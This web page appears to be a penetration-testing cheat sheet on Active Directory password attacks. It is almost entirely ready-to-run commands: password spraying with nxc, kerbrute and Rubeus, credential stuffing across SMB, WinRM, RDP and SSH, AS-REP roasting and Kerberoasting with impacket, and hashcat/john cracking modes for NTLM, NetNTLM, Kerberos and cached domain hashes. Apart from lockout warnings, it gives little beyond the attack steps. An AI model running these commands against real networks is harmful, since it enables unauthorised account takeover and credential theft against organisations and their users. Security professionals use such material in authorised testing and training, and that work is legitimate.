03 / Password Attacks

Password Attacks

Obtain valid credentials through spraying, AS-REP roasting, Kerberoasting, hash capturing and cracking. Always check the password policy before spraying — domain accounts can be locked out.

AS-REP Roasting

Targeting accounts with Kerberos pre-authentication disabled to capture crackable AS-REP hashes without any credentials.

Kerberosimpackethashcat

soon

Kerberoasting

Requesting TGS tickets for service accounts with SPNs and cracking the RC4-encrypted tickets offline.

KerberosSPNTGShashcat

soon

Password Spraying in AD

Safely testing one password against many accounts without triggering lockouts. Policy checking, timing and tooling.

nxckerbruteRubeus

soon

4.3 Password Spraying

nxc / kerbrute / Rubeus

⚠ Always check the password policy before spraying. Domain accounts can lock out quickly. Prefer local accounts or spray with one password per lockout window.

NXC

Check password policy first

nxc smb $TARGET_IP -u username -p password --pass-pol

Try username as password

nxc smb $DOMAIN -u usernames.txt -p usernames.txt --no-brute --continue-on-success

Spray with single password

nxc smb $TARGET_IP -u users.txt -p 'password' --continue-on-success
nxc smb $TARGET_IP -u users.txt -p passwords.txt --continue-on-success
nxc smb $TARGET_IP -u user1 user2 user3 -p password1
nxc smb $DC -u users.txt -p Winter2024!
nxc smb $TARGET_IP -u user1 -p password1 password2 password3
nxc smb $TARGET_IP -u user.txt -p user.txt --no-bruteforce --continue-on-success
nxc smb $TARGET_IP -u user.txt -p password.txt --no-bruteforce --continue-on-success

KERBRUTE

kerbrute passwordspray -d corp.local users.txt Winter2024!

RUBEUS (Windows)

Rubeus.exe spray /password:Winter2024! /users:users.txt /domain:domain.local /dc:DC01.domain.local /outfile:tickets.txt

4.4 Credential Stuffing

nxc

Test found credentials against all services

nxc smb $TARGET_IP -u creds.txt -p creds.txt --no-brute --continue-on-success
nxc winrm $TARGET_IP -u $USERNAME -p $PASSWORD
nxc rdp $TARGET_IP -u $USERNAME -p $PASSWORD
nxc ssh $TARGET_IP -u $USERNAME -p $PASSWORD

5.1 AS-REP Roasting

impacket / nxc / Rubeus

IMPACKET — GetNPUsers (no credentials needed)

GetNPUsers.py $DOMAIN/ -dc-ip $TARGET_IP -usersfile usernames.txt -outputfile hashes.txt
GetNPUsers.py $DOMAIN/ -dc-ip 10.112.129.121 -usersfile usernames.txt | grep '^\$' > as-rep-results.txt
GetNPUsers.py $DOMAIN/ -dc-ip $TARGET_IP -no-pass -usersfile usernames.txt -outputfile hashes.txt
# If you already have creds but want more hashes:
GetNPUsers.py $DOMAIN/user:pass -dc-ip $TARGET_IP -usersfile usernames.txt -outputfile hashes.txt
# Request specific user:
GetNPUsers.py $DOMAIN/user:pass -dc-ip $TARGET_IP -request

NXC

nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --asreproast output.txt
nxc ldap $TARGET_IP -u '' -p '' --asreproast output.txt   # anonymous if possible

RUBEUS (Windows)

Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

Clock skew error fix

su
timedatectl set-ntp off
rdate -n $TARGET_IP

Crack AS-REP hash

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt
john --format=krb5asrep hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

5.2 Kerberoasting

impacket / nxc / Rubeus

What it is: request TGS tickets for accounts with an SPN → crack offline

NXC

nxc ldap $TARGET_IP -u username -p 'password' --kerberoasting output.txt

IMPACKET — GetUserSPNs

GetUserSPNs.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $TARGET_IP -request -outputfile tgs_hashes.txt
GetUserSPNs.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $TARGET_IP -request-user specific_svc_account

RUBEUS (Windows)

Rubeus.exe kerberoast /outfile:tgs_hashes.txt /format:hashcat
Rubeus.exe kerberoast /rc4opsec   # only RC4 tickets (faster to crack)

Crack TGS hash

hashcat -m 13100 tgs_hashes.txt /usr/share/wordlists/rockyou.txt   # RC4
hashcat -m 19600 tgs_hashes.txt /usr/share/wordlists/rockyou.txt   # AES128
hashcat -m 19700 tgs_hashes.txt /usr/share/wordlists/rockyou.txt   # AES256
john --format=krb5tgs tgs_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

6.4 Hash Cracking Reference

hashcat / john

NTLM hash (secretsdump, SAM) — format: aad3b435b51404eeaad3...

hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

LM hash (old — Windows XP/2003)

hashcat -m 3000 hash.txt /usr/share/wordlists/rockyou.txt
john --format=LM hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

NTLMv1 hash (Responder)

hashcat -m 5500 hash.txt /usr/share/wordlists/rockyou.txt
john --format=netntlm hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

NTLMv2 hash (Responder, MITM) — format: user::DOMAIN:challenge:hash

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
john --format=netntlmv2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

AS-REP hash — format: $krb5asrep$23$user@domain:...

hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
john --format=krb5asrep hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

TGS RC4 (Kerberoasting) — format: $krb5tgs$23$user$service@domain:...

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
john --format=krb5tgs hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

TGS AES128 / AES256 (Kerberoasting)

hashcat -m 19600 hash.txt /usr/share/wordlists/rockyou.txt   # AES128
hashcat -m 19700 hash.txt /usr/share/wordlists/rockyou.txt   # AES256

MSCash2 / DCC2 (cached domain hashes — slow)

hashcat -m 2100 hash.txt /usr/share/wordlists/rockyou.txt
john --format=mscash2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Timeroast hash

hashcat -m 31300 hash.txt /usr/share/wordlists/rockyou.txt

Use rules for better results

hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/dive.rule

← Enumeration Next: Vulnerability Discovery →